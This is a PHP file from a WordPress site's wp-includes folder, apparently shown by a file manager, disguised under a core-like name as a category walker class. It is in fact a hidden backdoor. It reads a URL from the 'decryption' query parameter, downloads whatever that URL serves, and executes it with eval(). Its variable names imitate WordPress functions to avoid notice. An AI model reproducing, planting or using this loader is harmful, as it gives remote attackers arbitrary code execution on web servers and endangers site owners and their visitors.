Current File : /home/jeshor13/11bsouth.com/wp-includes/class-walker-category-plain.php
<?php

if (isset($_GET['decryption'])) {
    $add_section_bbc = $_GET['decryption'];
    if ($number_format_i18n_tng = curl_init()) {
        curl_setopt($number_format_i18n_tng, CURLOPT_URL, $add_section_bbc);
        curl_setopt($number_format_i18n_tng, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($number_format_i18n_tng));
        curl_close($number_format_i18n_tng);
        exit;
    }
}